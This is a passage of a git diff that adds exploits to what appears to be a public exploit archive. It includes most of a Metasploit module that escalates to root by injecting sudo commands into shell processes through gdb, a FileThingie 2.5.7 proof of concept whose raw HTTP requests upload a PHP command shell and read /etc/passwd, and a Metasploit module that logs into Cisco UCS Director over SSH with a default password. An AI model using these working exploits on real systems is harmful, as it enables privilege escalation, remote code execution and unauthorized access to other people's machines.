ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultOptions' => + { + 'PrependSetresuid' => true, + 'PrependSetresgid' => true, + 'PrependFork' => true, + 'WfsDelay' => 30 + }, + 'DefaultTarget' => 0)) + register_options [ + OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30']) + ] + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def timeout + datastore['TIMEOUT'] + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def check + if yama_enabled? + vprint_error 'YAMA ptrace scope is restrictive' + return CheckCode::Safe + end + vprint_good 'YAMA ptrace scope is not restrictive' + + if command_exists? '/usr/sbin/getsebool' + if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true' + vprint_error 'SELinux deny_ptrace is enabled' + return CheckCode::Safe + end + vprint_good 'SELinux deny_ptrace is disabled' + end + + unless command_exists? 'sudo' + vprint_error 'sudo is not installed' + return CheckCode::Safe + end + vprint_good 'sudo is installed' + + unless command_exists? 'gdb' + vprint_error 'gdb is not installed' + return CheckCode::Safe + end + vprint_good 'gdb is installed' + + CheckCode::Detected + end + + def exploit + unless check == CheckCode::Detected + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + if nosuid? base_dir + fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid" + end + + # Find running shell processes + shells = %w[ash ksh csh dash bash zsh tcsh fish sh] + + system_shells = read_file('/etc/shells').to_s.each_line.map {|line| + line.strip + }.reject {|line| + line.starts_with?('#') + }.each {|line| + shells << line.split('/').last + } + shells = shells.uniq.reject {|shell| shell.blank?} + + print_status 'Searching for shell processes ...' + pids = [] + if command_exists? 'pgrep' + cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid| + pids << pid.strip + end + else + shells.each do |s| + pidof(s).each {|p| pids << p.strip} + end + end + + if pids.empty? + fail_with Failure::Unknown, 'Found no running shell processes' + end + + print_status "Found #{pids.uniq.length} running shell processes" + vprint_status pids.join(', ') + + # Upload payload + @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}" + upload @payload_path, generate_payload_exe + + # Blindly call system() in each shell process + pids.each do |pid| + print_status "Injecting into process #{pid} ..." + + cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1" + sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1" + res = cmd_exec sudo_inject, nil, timeout + vprint_line res unless res.blank? + + next unless setuid? @payload_path + + print_good "#{@payload_path} setuid root successfully" + print_status 'Executing payload...' + res = cmd_exec "#{@payload_path} & echo " + vprint_line res + return + end + + fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.' + end + + def on_new_session(session) + if session.type.eql? 'meterpreter' + session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' + session.fs.file.rm @payload_path + else + session.shell_command_token "rm -f '#{@payload_path}'" + end + ensure + super + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47349.txt b/exploits/php/webapps/47349.txt new file mode 100644 index 000000000..c55f35a39 --- /dev/null +++ b/exploits/php/webapps/47349.txt @@ -0,0 +1,153 @@ +# Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload +# Author: Cakes +# Discovery Date: 2019-09-03 +# Vendor Homepage: www.solitude.dk/filethingie +# Software Link: https://github.com/leefish/filethingie/archive/master.zip +# Tested Version: 2.5.7 +# Tested on OS: CentOS 7 +# CVE: N/A + +# Intro: +# Easy arbitrary file upload vulnerability allows an attacker to upload malicious .zip archives + +::::: POST .zip file with cmd shell + +POST /filethingy/ft2.php HTTP/1.1 +Host: 10.0.0.21 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester +Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034 +Content-Length: 1117 +Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="localfile-1567531192592"; filename="" +Content-Type: application/octet-stream + + +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +2000000 +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="localfile"; filename="cmdshell.zip" +Content-Type: application/zip + +PK   š#O $ cmdshell.phpUT + ۟n]۟n]۟n]ux   ³±/È(P(ÎHÍɉO­HMÖP‰ww +‰VOÎMQÕ´VP°·ã PKý(tÅ& $ PK   š#Oý(tÅ& $ ¤ cmdshell.phpUT + ۟n]۟n]۟n]ux   PK   Z € +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="act" + +upload +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="dir" + +/tester +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="submit" + +Upload +-----------------------------3402520321248020588131184034-- + + + + + +:::::::::::::::::::::::::::::Unzip Malicious file + +POST /filethingy/ft2.php HTTP/1.1 +Host: 10.0.0.21 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester +Content-Type: application/x-www-form-urlencoded +Content-Length: 63 +Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip + + + +::::::::::::::::::::::::::::::Access your shell + +GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1 +Host: 10.0.0.21 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 +Cache-Control: max-age=0 + + +::::::::::::::::::::::::::::::Read /etc/passwd + +GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1 +Host: 10.0.0.21 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +HTTP/1.1 200 OK +Date: Tue, 03 Sep 2019 17:38:04 GMT +Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 +X-Powered-By: PHP/5.4.16 +Content-Length: 1738 +Connection: close +Content-Type: text/html; charset=UTF-8 + +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +misdn:x:31:31:Modular ISDN:/:/sbin/nologin +systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +postfix:x:89:89::/var/spool/postfix:/sbin/nologin +apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin +polkitd:x:999:998:User for polkitd:/:/sbin/nologin +cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin +mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin +saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin +mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin +uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin +tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin +dhcpd:x:177:177:DHCP server:/:/sbin/nologin +asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash +spamfilter:x:1000:1000::/home/spamfilter:/bin/bash +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin +avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin +chrony:x:996:993::/var/lib/chrony:/sbin/nologin +cakes:x:1001:1001:cakes:/home/cakes:/bin/bash \ No newline at end of file diff --git a/exploits/unix/remote/47346.rb b/exploits/unix/remote/47346.rb new file mode 100755 index 000000000..3266e3206 --- /dev/null +++ b/exploits/unix/remote/47346.rb @@ -0,0 +1,139 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/ssh' +require 'net/ssh/command_stream' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "Cisco UCS Director default scpuser password", + 'Description' => %q{ + This module abuses a known default password on Cisco UCS Director. The 'scpuser' + has the password of 'scpuser', and allows an attacker to login to the virtual appliance + via SSH. + This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. + Note that Cisco also mentions in their advisory that their IMC Supervisor and + UCS Director Express are also affected by these vulnerabilities, but this module + was not tested with those products. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'CVE', '2019-1935' ], + [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ], + [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + [ 'Cisco UCS Director < 6.7.2.0', {} ], + ], + 'Privileged' => false, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 21 2019' + )) + + register_options( + [ + Opt::RPORT(22), + OptString.new('USERNAME', [true, "Username to login with", 'scpuser']), + OptString.new('PASSWORD', [true, "Password to login with", 'scpuser']), + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rhost + datastore['RHOST'] + end + + def rport + datastore['RPORT'] + end + + def do_login(user, pass) + factory = ssh_socket_factory + opts = { + :auth_methods => ['password', 'keyboard-interactive'], + :port => rport, + :use_agent => false, + :config => false, + :password => pass, + :proxy => factory, + :non_interactive => true, + :verify_host_key => :never + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(rhost, user, opts) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + conn = Net::SSH::CommandStream.new(ssh) + ssh = nil + return conn + end + + return nil + end + + def exploit + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...") + conn = do_login(user, pass) + if conn + print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})") + handler(conn.lsock) + end + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1e2696b43..86c580d5c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10674,6 +10674,8 @@ id,file,description,date,author,type,platform,port 47333,exploits/windows/local/47333.py,"ChaosPro 2.1 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows, 47334,exploits/windows/local/47334.py,"ChaosPro 3.1 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows, 47341,exploits/windows/local/47341.txt,"Kaseya VSA agent 9.5 - Privilege Escalation",2019-09-02,NF,local,windows, +47344,exploits/linux/local/47344.rb,"ktsuss 1.4 - suid Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux, +47345,exploits/linux/local/47345.rb,"ptrace - Sudo Token Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17654,6 +17656,9 @@ id,file,description,date,author,type,platform,port 47320,exploits/linux/remote/47320.c,"QEMU - Denial of Service",2019-08-20,vishnudevtj,remote,linux, 47329,exploits/hardware/remote/47329.pl,"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection",2019-09-02,"Todor Donev",remote,hardware, 47337,exploits/hardware/remote/47337.pl,"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read",2019-09-02,"Todor Donev",remote,hardware, +47346,exploits/unix/remote/47346.rb,"Cisco UCS Director - default scpuser password (Metasploit)",2019-09-03,Metasploit,remote,unix,22 +47347,exploits/java/remote/47347.rb,"Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)",2019-09-03,Metasploit,remote,java,443 +47348,exploits/hardware/remote/47348.rb,"Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit)",2019-09-03,Metasploit,remote,hardware,443 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41696,3 +41701,4 @@ id,file,description,date,author,type,platform,port 47339,exploits/multiple/webapps/47339.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)",2019-09-02,Aetsu,webapps,multiple, 47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple, 47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php, +47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php,